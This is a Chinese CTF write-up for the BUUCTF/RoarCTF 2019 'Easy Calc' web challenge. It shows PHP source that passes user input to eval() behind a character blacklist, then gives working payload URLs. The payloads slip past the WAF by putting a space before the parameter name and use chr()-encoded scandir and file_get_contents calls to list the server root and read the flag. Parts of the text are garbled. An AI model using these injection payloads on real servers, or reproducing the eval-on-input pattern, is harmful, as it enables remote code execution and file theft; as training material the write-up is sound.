BUUCTF WEB [RoarCTF 2019]Easy Calc(小宇特详解)
打开网页后是这样的。
这里先查看一下源代码
这里显示是有waf的,直接访问一下calc.php来查看。
<?php
error_reporting(0);
if(!isset($_GET['num'])){
show_source(__FILE__);
}else{
$str = $_GET['num'];
$blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
foreach ($blacklist as $blackitem) {
if (preg_match('/' . $blackitem . '/m', $str)) {
die("what are you want to do?");
}
}
eval('echo '.$str.';');
}
?>
这里过滤了t,r,n,等一些字符
这里的思路就是传入参数num,然后绕过过滤。
方法一:使用PHP字符串解析特性Bypass
这里的原理就是php会将在URL和正文中的查询字符串转化为内部 G E T 或 的 关 联 数 组 _GET或的关联数组 GET或的关联数组_POST
就是php在解析查询字符串时会
1.删除空白符
2.将某些字符转换为下划线(包括空格)
这里直接在num前加上空格绕过waf。
这里是用的%20来作为空格
这里使用两个php函数:
scandir():列出参数目录中的文件和目录
readfile():读取文件内容
利用scandir()找到flag在哪,再利用readfile()读取文件内容,从而得到flag
这里过滤的原理是
如果传参的num里出现黑名单里面的就会报错
这里用空格隔开后,就是空格加num不在num的判断黑名单中。
http://node4.buuoj.cn:28154/calc.php?%20num=1;var_dump(scandir(chr(47)))
然后利用php字符串解析特性,在解析的时候将转换为下划线。
这里找到了f1agg
这里利用file_get_contents把整个文件读入一个字符串中。
? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
这样就进行了
访问flag文件
chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))